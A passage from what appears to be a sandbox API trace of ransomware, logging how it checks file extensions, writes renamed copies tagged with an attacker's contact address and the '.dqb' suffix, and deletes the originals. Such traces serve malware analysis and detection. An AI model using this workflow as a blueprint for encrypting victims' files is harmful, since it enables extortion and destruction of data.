Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1AR.LEX.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1ar.lex.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.315] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\VBE7.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\vbe7.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.328] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\FPSRVUTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\fpsrvutl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.368] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), lpNewFileName="C:\\Program Files\\DVD Maker\\DVDMaker.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.373] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdBase.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\omdbase.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.373] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\OmdProject.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\omdproject.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.374] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\Pipeline.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\pipeline.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0271.374] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), lpNewFileName="C:\\Program Files\\DVD Maker\\PipeTran.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\pipetran.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.024] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=7168) returned 1 [0272.024] CloseHandle (hObject=0x31c) returned 1 [0272.024] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui")) returned 0x20 [0272.025] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.025] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.025] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0272.025] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0272.025] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0272.026] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0272.026] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0272.026] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0272.026] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0272.026] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0272.026] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0272.026] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0272.026] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0272.026] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0272.026] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0272.026] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0272.026] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0272.027] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0272.027] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0272.027] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.027] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0272.273] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=1013248) returned 1 [0272.273] CloseHandle (hObject=0x324) returned 1 [0272.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll")) returned 0x20 [0272.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\iedvtool.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.273] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.486] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.486] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0274.508] GetLastError () returned 0x0 [0274.508] ReadFile (in: hFile=0x2d4, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x246a, lpOverlapped=0x0) returned 1 [0274.525] WriteFile (in: hFile=0x32c, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0x2470, lpOverlapped=0x0) returned 1 [0274.526] ReadFile (in: hFile=0x2d4, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.526] WriteFile (in: hFile=0x32c, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.526] SetEndOfFile (hFile=0x32c) returned 1 [0274.526] CloseHandle (hObject=0x32c) returned 1 [0274.526] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.527] SetEndOfFile (hFile=0x2d4) returned 1 [0274.530] CloseHandle (hObject=0x2d4) returned 1 [0274.530] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.530] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid")) returned 1 [0274.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.531] lstrlenW (lpString=".doc") returned 4 [0274.531] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.531] lstrlenW (lpString=".docx") returned 5 [0274.531] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.531] lstrlenW (lpString=".pdf") returned 4 [0274.531] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.531] lstrlenW (lpString=".xls") returned 4 [0274.531] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.531] lstrlenW (lpString=".xlsx") returned 5 [0274.531] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.531] lstrlenW (lpString=".ppt") returned 4 [0274.531] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.531] lstrlenW (lpString=".zip") returned 4 [0274.531] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.531] lstrlenW (lpString=".rar") returned 4 [0274.531] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.531] lstrlenW (lpString=".bz2") returned 4 [0274.531] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.531] lstrlenW (lpString=".7z") returned 3 [0274.531] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.531] lstrlenW (lpString=".dbf") returned 4 [0274.531] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.531] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.532] lstrlenW (lpString=".1cd") returned 4 [0274.532] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.532] lstrlenW (lpString=".jpg") returned 4 [0274.532] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.532] lstrlenW (lpString=".doc") returned 4 [0274.532] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.532] lstrlenW (lpString=".docx") returned 5 [0274.532] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.532] lstrlenW (lpString=".pdf") returned 4 [0274.532] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.532] lstrlenW (lpString=".xls") returned 4 [0274.532] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.532] lstrlenW (lpString=".xlsx") returned 5 [0274.532] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.532] lstrlenW (lpString=".ppt") returned 4 [0274.532] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.532] lstrlenW (lpString=".zip") returned 4 [0274.532] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.532] lstrlenW (lpString=".rar") returned 4 [0274.532] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.532] lstrlenW (lpString=".bz2") returned 4 [0274.532] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.532] lstrlenW (lpString=".7z") returned 3 [0274.532] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.532] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.532] lstrlenW (lpString=".dbf") returned 4 [0274.532] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.533] lstrlenW (lpString=".1cd") returned 4 [0274.533] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0274.533] lstrlenW (lpString=".jpg") returned 4 [0274.533] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.533] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.533] lstrlenW (lpString="EXPLR_01.MID") returned 12 [0274.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0274.698] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=10562) returned 1 [0274.698] CloseHandle (hObject=0x320) returned 1 [0274.698] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 0x20 [0274.703] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.732] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.802] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.802] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.810] GetLastError () returned 0x0 [0274.810] ReadFile (in: hFile=0x310, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x2942, lpOverlapped=0x0) returned 1 [0274.827] WriteFile (in: hFile=0x328, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0x2950, lpOverlapped=0x0) returned 1 [0274.828] ReadFile (in: hFile=0x310, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.828] WriteFile (in: hFile=0x328, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.828] SetEndOfFile (hFile=0x328) returned 1 [0274.828] CloseHandle (hObject=0x328) returned 1 [0274.828] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.828] SetEndOfFile (hFile=0x310) returned 1 [0274.856] CloseHandle (hObject=0x310) returned 1 [0274.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\explr_01.mid")) returned 1 [0274.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.886] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.886] lstrlenW (lpString=".doc") returned 4 [0274.886] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.886] lstrlenW (lpString=".docx") returned 5 [0274.886] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.886] lstrlenW (lpString=".pdf") returned 4 [0274.886] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.886] lstrlenW (lpString=".xls") returned 4 [0274.887] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.887] lstrlenW (lpString=".xlsx") returned 5 [0274.887] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.887] lstrlenW (lpString=".ppt") returned 4 [0274.887] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.887] lstrlenW (lpString=".zip") returned 4 [0274.887] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.887] lstrlenW (lpString=".rar") returned 4 [0274.887] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.887] lstrlenW (lpString=".bz2") returned 4 [0274.887] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.887] lstrlenW (lpString=".7z") returned 3 [0274.887] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.887] lstrlenW (lpString=".dbf") returned 4 [0274.887] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.887] lstrlenW (lpString=".1cd") returned 4 [0274.887] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.887] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.888] lstrlenW (lpString=".jpg") returned 4 [0274.888] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.888] lstrlenW (lpString=".doc") returned 4 [0274.888] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.888] lstrlenW (lpString=".docx") returned 5 [0274.888] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.888] lstrlenW (lpString=".pdf") returned 4 [0274.888] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.888] lstrlenW (lpString=".xls") returned 4 [0274.888] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.888] lstrlenW (lpString=".xlsx") returned 5 [0274.888] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.888] lstrlenW (lpString=".ppt") returned 4 [0274.888] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.888] lstrlenW (lpString=".zip") returned 4 [0274.888] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.888] lstrlenW (lpString=".rar") returned 4 [0274.888] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.888] lstrlenW (lpString=".bz2") returned 4 [0274.888] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.888] lstrlenW (lpString=".7z") returned 3 [0274.888] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.888] lstrlenW (lpString=".dbf") returned 4 [0274.889] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.889] lstrlenW (lpString=".1cd") returned 4 [0274.889] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 63 [0274.889] lstrlenW (lpString=".jpg") returned 4 [0274.889] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.889] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.889] lstrlenW (lpString="MUSIC_01.MID") returned 12 [0274.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.908] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=6880) returned 1 [0274.908] CloseHandle (hObject=0x31c) returned 1 [0274.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid")) returned 0x20 [0274.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.909] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.909] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0274.909] GetLastError () returned 0x0 [0274.909] ReadFile (in: hFile=0x31c, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x1ae0, lpOverlapped=0x0) returned 1 [0274.911] WriteFile (in: hFile=0x330, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0x1af0, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0x1af0, lpOverlapped=0x0) returned 1 [0274.912] ReadFile (in: hFile=0x31c, lpBuffer=0x4050020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x360fed4, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesRead=0x360fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.912] WriteFile (in: hFile=0x330, lpBuffer=0x4050020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x360fc9c, lpOverlapped=0x0 | out: lpBuffer=0x4050020*, lpNumberOfBytesWritten=0x360fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.912] SetEndOfFile (hFile=0x330) returned 1 [0274.912] CloseHandle (hObject=0x330) returned 1 [0274.912] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x360fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.912] SetEndOfFile (hFile=0x31c) returned 1 [0274.916] CloseHandle (hObject=0x31c) returned 1 [0274.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 